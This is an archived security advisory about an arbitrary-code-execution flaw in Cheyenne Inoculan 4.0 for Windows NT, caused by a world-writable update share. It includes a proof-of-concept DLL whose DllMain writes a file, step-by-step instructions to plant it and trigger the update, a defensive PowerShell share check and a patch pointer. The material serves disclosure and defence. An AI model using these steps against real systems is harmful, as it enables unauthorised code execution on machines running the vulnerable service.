COMMAND

    Cheyenne Inoculan

SYSTEMS AFFECTED

    Win NT

PROBLEM

    Paul Boyer found the following.  It is possible to run arbitrary code
    on any Intel machine running Cheyenne Inoculan version 4.0 for Windows
    NT (any version of NT) prior to SP2.  The same kind of vulnerability
    might exist in other anti-virus products that provide an auto-update
    mechanism.

    To check if you are vulnerable (if you have the resource kit
    installed), run SRVCHECK.EXE \\<YourMachine>; otherwise run srvmgr.exe
    from an NT server in the same domain, select <YourMachine> and choose
    "Computer|Shared Directories".  If there is a shared directory called
    "CHEYUPD$" that grants "FULL CONTROL" to the "EVERYONE" group, that's
    bad news.
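    The same check as a script, added here and not part of the advisory: it
    inspects both the share ACL and the NTFS ACL of the backing folder,
    since effective access is the intersection of the two.  It assumes the
    SmbShare module (Windows 8 / Server 2012 and later); NT 4 itself only
    has SRVCHECK.EXE / srvmgr.exe for this.

```powershell
# Added example, not part of the advisory. Assumes the SmbShare module
# (Windows 8 / Server 2012 and later) and Get-Acl on an NTFS path.
function Test-CheyUpdShare {
    param([string]$ShareName = 'CHEYUPD$')

    # Resolve the well-known Everyone SID (S-1-1-0) to its local name so the
    # comparison also works on non-English systems.
    $everyone = ([System.Security.Principal.SecurityIdentifier]'S-1-1-0').Translate(
                    [System.Security.Principal.NTAccount]).Value

    $share = Get-SmbShare -Name $ShareName -ErrorAction SilentlyContinue
    if (-not $share) {
        return [pscustomobject]@{ Share = $ShareName; Present = $false; Exposed = $false }
    }

    # Share-level ACL: the advisory's bad case is Everyone / Allow / Full.
    $shareFull = Get-SmbShareAccess -Name $ShareName |
        Where-Object { $_.AccountName -ieq $everyone -and
                       $_.AccessControlType -eq 'Allow' -and
                       $_.AccessRight -eq 'Full' }

    # NTFS ACL on the backing folder: a write-capable ACE for Everyone is what
    # lets a remote user drop filelist.txt / avh32dll.dll into the Ready path.
    # (Caveat: ACEs expressed with generic rights such as GENERIC_ALL do not
    # match the WriteData bit and would need separate handling.)
    $writeData = [int][System.Security.AccessControl.FileSystemRights]::WriteData
    $ntfsWrite = (Get-Acl -Path $share.Path).Access |
        Where-Object { $_.IdentityReference.Value -ieq $everyone -and
                       $_.AccessControlType -eq 'Allow' -and
                       ((([int]$_.FileSystemRights) -band $writeData) -ne 0) }

    [pscustomobject]@{
        Share             = $ShareName
        Present           = $true
        Path              = $share.Path
        EveryoneFull      = [bool]$shareFull
        NtfsEveryoneWrite = [bool]$ntfsWrite
        # Both layers must grant write access for the advisory's scenario to apply
        Exposed           = ([bool]$shareFull -and [bool]$ntfsWrite)
    }
}

Test-CheyUpdShare | Format-List
```

    A result with Exposed = True means Everyone can place files in the
    update path; restrict the share and the NTFS ACL to the update account
    and apply the vendor patch listed under SOLUTION.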

    Inoculan runs as a service called "Cheyenne InocuLAN Anti-Virus
    Server".  When it starts, it replaces any shared directory with the
    same name and shares "CHEYUPD$" with full control for the Everyone
    group.  When the service starts, it does an update check in this
    directory (usually "C:\Inoculan\Update\") using the files
    "<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and
    [idem]...\avh32dll.dll.

    Simply "touching" or modifying the file "filelist.txt" so that it
    appears newer than it really is triggers the update.  The update
    causes the service to stop, the avh32dll.dll DLL to replace the
    existing one (usually c:\inoculan\avh32dll.dll), and then the service
    to start again.  When the service starts, it loads the DLL into memory
    and only THEN does a lot of other work (including checking whether it
    is a valid DLL).  The problem is that you can write a DLL that executes
    arbitrary code at the time it is loaded into memory, at the precise
    moment DllMain is called by the image loader, before any other
    function has a chance to be called...  Example (inoctroj.cpp):

    #include <windows.h>
    #include <stdio.h>
    #include <string.h>

    /* Entry point the image loader calls as soon as the DLL is mapped,
       before the service has checked whether it is a valid DLL. */
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
        /* Any code can go here.  This is an example: it simply creates a
           file in the root of the C: drive and writes "hello world !"
           into it. */
        const char *buf = "hello world !";
        FILE *demo;

        /* create the file */
        demo = fopen("C:\\I_can_write_a_file.txt", "w");
        if (demo != NULL) {
            /* write to the file */
            fwrite(buf, 1, strlen(buf), demo);
            fclose(demo);
        }

        /* Returning FALSE aborts the DLL loading.  Anyway, we're done at
           that time ;)) */
        return FALSE;
    }

    Compile and link it to produce the target avh32dll.dll.

    Write it to <NtBox>\CHEYUPD$\English\NtIntel\Ready\

    Touch <NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt in the same
    directory so that it is more recent than before.

    Stop the "Cheyenne InocuLAN Anti-Virus Server" service on the <NtBox>
    machine and start it again (alternatively, shut down and restart the
    machine).  Here you are: there is a file "I_can_write_a_file.txt" in
    "C:\" on <NtBox>.

    An interesting point is that Inoculan uses "domains".  In one domain,
    a single server forwards the updates to all machines participating in
    that "domain" (nothing to do with NT domains).  THIS WAS NOT TESTED,
    but one would expect a much worse scenario if the trojan is written to
    the Inoculan domain server's CHEYUPD$ shared directory: the trojan
    would be copied to all machines of that domain.  This is serious,
    because all those machines would then be running arbitrary code in
    place of the anti-virus program.

SOLUTION

    There is an InocuLAN for Windows NT Security Patch.  This patch
    addresses possible security concerns regarding the CHEYUPD$ hidden
    share.  It can be applied to builds 269 and 270 (Service Pack 1
    level) or build 373 (Service Pack 2A level).  Get it at:

        http://www.cai.com/cheyenne/CheyTech/techbases/ilnt/cheyupd$.html